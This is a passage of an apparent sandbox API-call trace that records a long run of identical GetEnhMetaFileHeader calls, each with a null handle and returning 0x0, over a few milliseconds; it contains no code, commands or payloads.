lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] 
